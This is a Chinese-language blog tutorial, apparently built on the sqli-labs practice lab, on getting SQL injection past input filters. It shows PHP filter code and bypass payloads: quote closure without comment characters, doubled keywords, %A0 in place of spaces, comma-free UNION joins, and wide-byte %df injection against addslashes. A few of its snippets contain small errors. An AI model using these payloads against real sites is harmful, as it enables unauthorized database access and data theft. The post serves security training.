SQL注入---字符绕过

已于 2024-04-30 00:33:19 修改
阅读量533 收藏 7
点赞数 4
分类专栏: 网络安全攻击 文章标签: sql java 前端
于 2024-04-10 21:32:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhoutong2323/article/details/137607405
版权

文章目录

一.注释符绕过

当网页源代码中出现如下代码后,常见的注释符号将无效,因此需要通过特殊手段进行绕过

$reg = "/#/";
$reg1 = "/--/";
$replace = "";
#若id中提取出的字符中包含reg(#)类型的特殊符号将会被replace类型的符号(空)替换
$id = preg_replace($reg, $replace, $id);
$id = preg_replace($reg1, $replace, $id);

上述代码中无法使用符号(#)或(--+)将后面的sql语句注释,因此需要通过特殊手段将后面多出的单引号闭合

演示案例:

单引号闭合:?id=1' and 1=1 '  括号单引号:?id=1') and 1=1( '

双引号闭合:?id=1'' and 1=1'' 

$sql="SELECT * FROM users WHERE id='id=1' and 1=1 '' LIMIT 0,1";

 二.and 和 or 过滤绕过

过滤源代码

function blacklist($id)
{
#若提取的id中包含or字符,将or替换为空
	$id= preg_replace('/or/i',"", $id);			
	$id= preg_replace('/AND/i',"", $id);		
	
	return $id;
}

注:i:代表无论or/and 是大写还是小写统一转译为小写

 绕过手法

复写过滤字符
?id=1' anandd 1=1--+

三.空格过滤绕过

 过滤代码:

$id= blacklist($id);
$hint=$id;

function blacklist($id)
{
	$id= preg_replace('/or/i',"", $id);			
	$id= preg_replace('/and/i',"", $id);		
	$id= preg_replace('/[\/\*]/',"", $id);		
	$id= preg_replace('/[--]/',"", $id);		
	$id= preg_replace('/[#]/',"", $id);			
	$id= preg_replace('/[\s]/',"", $id);		
	$id= preg_replace('/[\/\\\\]/',"", $id);		
	return $id;
}

绕过手法:

 在不同的环境中能够绕过的URL编码有所不同,因此需要多次尝试。

演示案例:

未使用URL编码注入前:符号被过滤

http://192.168.100.10/sql/Less-26/index.php?id=1' union select 1,2,3--+;

 使用URL注入编码后

http://192.168.100.10/sql/Less-26/index.php?id=1%A0union%A0select 1,2,3--+;

报错注入:

 

 四.逗号过滤绕过

id=1' union select 1,2,3--+

id=1' union select * from (select 1)a join (select 2)b join (select 3)c--+

 五.宽字节绕过

宽字节注入原理

宽字节注入前提:数据库使用GBKB编码

PHP中的转译函数:addslashes(); --使特殊符号的作用失效

源代码:

function check_addslashes($string)
{
    $string = preg_replace('/'. preg_quote('\\') .'/', "\\\\\\", $string);          //escape any backslash
    $string = preg_replace('/\'/i', '\\\'', $string);                               //escape single quote with a backslash
    $string = preg_replace('/\"/', "\\\"", $string);                                //escape double quote with a backslash
      
    
    return $string;
}

这个函数是用来处理字符串中的特殊字符,将其进行转义处理。

  1. 第一行代码使用正则表达式替换函数preg_replace将字符串中的反斜杠(\)替换为三个反斜杠(\\),这是为了将反斜杠进行转义。
  2. 第二行代码使用正则表达式替换函数preg_replace将字符串中的单引号(')替换为反斜杠和单引号('),这是为了将单引号进行转义。
  3. 第三行代码使用正则表达式替换函数preg_replace将字符串中的双引号(")替换为反斜杠和双引号("),这是为了将双引号进行转义。

最后,将处理后的字符串返回。这个函数通常用于防止在数据库操作中出现语法错误,例如在插入数据时,如果字符串中包含了单引号或双引号,可能会导致SQL语句出错。通过使用这个函数,可以将特殊字符进行转义,确保数据的安全性和完整性。

<?php
$a="benben is a \"good\" boy";
$b=addslashes($a);
echo $b
>

执行结果:benben is a \'good\' boy!

宽字节注入演示案例:

/index.php?id=-1' select union 1,2,3--+

报错结果分析:-1\' select union 1,2,3--  
            addslashes()函数将特殊符号'转译为无特殊作用的符号' 导致无法起到闭合的作用

 宽字节绕过

id=-1%df‘ union select 1,2,3--+

注:使用%df使转译函数失效

 总结

北 染 星 辰
关注
  • 4
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
SQL注入绕过 单引号 限制继续注入
10-29
我想不少人都看过一些关于SQL Injection针对SQL Server攻击的文章,都是因为变量过滤不足甚至没有过滤而构造畸形SQL语句注入的
SQL注入写shell 单引号过滤解决思路
最新发布
m0_62207482的博客
03-18 674
写 shell: root 权限,GPC 关闭,知道文件路径outfile函数。%0a、%0b、%a0 等/**/ 等注释符<>
SQL注入 单引号类型+空格过滤
Auroraxsn的博客
04-24 1942
初始页面: 1.判断注入类型 ?name=root' 页面返回异常,既没有表格内容也没有表格的列名 ?name=root" 页面返回正常,没有表格内容但有表格列名,判断为单引号类型 ?name=root'--+ 页面报错,显示“ERROR NO SPACE”,猜测可能有空格过滤 ?name=root'%23 ?name=root'/**/' ?name=root'and(1=1)%23 页面返回正常,即有表格内容又有表格列名,判断为空格过滤 ...
sql注入常见绕过方法
ljlrookiebird的博客
09-05 3301
sql注入是web安全的常见漏洞,这里总结下常见的绕过姿势,还有其他没总结到了,小伙伴可以留言补充
SQL注入
m0_73170217的博客
01-31 619
SQL注入指网站应用对用户输入的恶意数据没有进行过滤和防御、导致用户通过将恶意的SQL查询或添加语句拼接到网站的输入参数中带入到数据库中从而进行获取数据库信息等攻击。
.NET 分享两个SQL注入防御加固解决方案
ahhacker86的专栏
01-18 903
SQL 注入绕过技术是一个老生常谈的话题,很多网站都接入了 WAF 等安全产品以此增强拦截和抵御 SQL 注入攻击的能力,另外从纵深防御的策略看还有在应用内部嵌入安全防护模块增强对请求输入参数进行过滤和拦截。下面提供两个防止注入漏洞产生的解决方案。
SQL注入漏洞(绕过篇)
errorr0
06-24 4599
SQL注入绕过手法
sql注入问题后端字符过滤
weixin_39693899的博客
12-29 481
sql注入问题
网络安全——绕过
W981113的博客
01-01 3972
1.编码的问题 http在传输特殊字符时需要在浏览器中编码,常见的比如空格、回车符等 编码是有规定的,但是具体如何编码没有规定,不同浏览器编码方案不一致,不同字段编码方案也不一样 结论:所有浏览器都有编码的习惯,那么后台接收数据时。首先需要处理编码就是解码,解码是把已编码的字符还原,其余未编码的不动。 2.实际测试 当对浏览器的输入区域进行输入字符时会出现两种情况: 1.输入的字段被浏览器自动编码,例如输入空格,浏览器自动编码为%20,传输时http中也是%20形式传输的 2.输入的字段是编码形式,浏览器自
Web安全SQL注入精讲视频.zip
04-16
目录网盘文件永久链接 1-1 SQL注入的业务场景以及危害.mp4 ...3-2 绕过and-or字符过滤.mp4 3-3 绕过空格过滤.mp4 3-4 内联注释绕过.mp4 3-5 宽字节注入.mp4 3-6 过滤函数绕过(综合实验).mp4 4-1SQL注入防御.mp4
Web应用安全:使用SQL注入绕过认证.pptx
06-17
使用SQL注入绕过认证 使用SQL注入绕过认证 1、SQL注入分类 SQL注入类型 数字型注入 字符型注入 其他类型注入 使用SQL注入绕过认证 1、SQL注入分类 数字型注入 许多网页链接有类似 /users.php?id=1 的结构,基于此种...
php is_numberic函数造成的SQL注入漏洞
01-21
一、is_numberic函数简介国内一部分CMS程序里面有用到过is_numberic函数,我们先看看这个函数的结构bool is_numeric (mixed $var)如果 var 是数字和数字字符串则返回 TRUE,否则返回 FALSE。二、函数是否安全接下来...
超级SQL注入工具V1.0正式版源码
03-31
超级SQL注入工具支持手动灵活的进行SQL注入绕过,可自定义进行字符替换等绕过注入防护。 本工具为渗透测试人员、信息安全工程师等掌握SQL注入技能的人员设计,需要使用人员对SQL注入有一定了解。 工具特点: 1....
SQL注入方法讲义
07-20
这种攻击手法可以绕过身份验证、访问控制和输入验证等安全机制,导致严重的安全隐患。 SQL 注入的原理 SQL 注入的原理是从客户端提交特殊的代码,从而收集程序及服务器的信息,从而获取你想到得到的资料。例如,在...
mysql注入绕过单引号_SQL注入-绕过过滤规则
weixin_28788777的博客
01-28 8196
过滤规则产生的原因前两篇举例了SQL注入Get请求/SQL注入Post请求的案例,都是因为程序要接收用户输入的变量或者URL传递的参数,并且参数或变量会被组成 SQL语句的一部分被执行。这些数据我们统称为外部数据,在安全领域有一条规则:一切外部数据是不可信任的。所以我们需要通过各种方式对数据进行检测和过滤。扩展:PHP的过滤函数preg_replace(mixed $pattern , mixed...
mysql注入单引号过滤_避开sql注入过滤的几个方法
weixin_33375360的博客
02-05 6742
有的时候,很容易受到SQL注入攻击的程序,可能会进行输入过滤,用来防止攻击者无限制的利用其中存在的设计缺陷。唱出会删除或者净化一些字符,或者阻止常用的sql关键词。我们通常有以下几种技巧,去避开这些过滤。1,避免使用被阻止的字符,即不使用这些字符仍然达到攻击目的。A,如果注入一个数字数据字段,就不需要使用单引号。B,输入注释符号被阻止使用,我们可以设计注入的数据,既不破坏周围的查询语法。目的其实很...
渗透测试-SQL注入手法与绕过手段
Sgirll的博客
06-17 775
union select 1,group_concat(table_name),3:使用 UNION 操作符,这部分查询语句返回一个包含三列数据的结果集:第一列是数字 1,第二列是目标数据库中所有数据表的名称列表,这里使用了 GROUP_CONCAT 函数进行聚合拼接,第三列是数字 3。该攻击利用了 SQL 注入漏洞,通过修改原有的 SQL 语句,绕过了应用程序的输入校验机制,从而对目标数据库造成了安全风险。id=1:假定这是一个 Web 应用程序的 URL 查询字符串参数,指定了 id 参数的值为 1。
sql注入转义字符绕过
11-02
SQL注入是一种常见的攻击方式,攻击者通过在SQL语句中注入恶意代码来获取敏感信息或者控制数据库。而转义字符是一种防止SQL注入的常用手段,但是攻击者可以通过绕过转义字符来达到攻击的目的。以下是一些常见的绕过转义字符的方法: 1.使用双写绕过,例如将单引号'转义为'' 2.使用16进制编码绕过,例如将单引号'转义为\x27 3.使用注释符绕过,例如将单引号'转义为'/* 4.使用特殊字符绕过,例如将单引号'转义为%27

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

北 染 星 辰

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值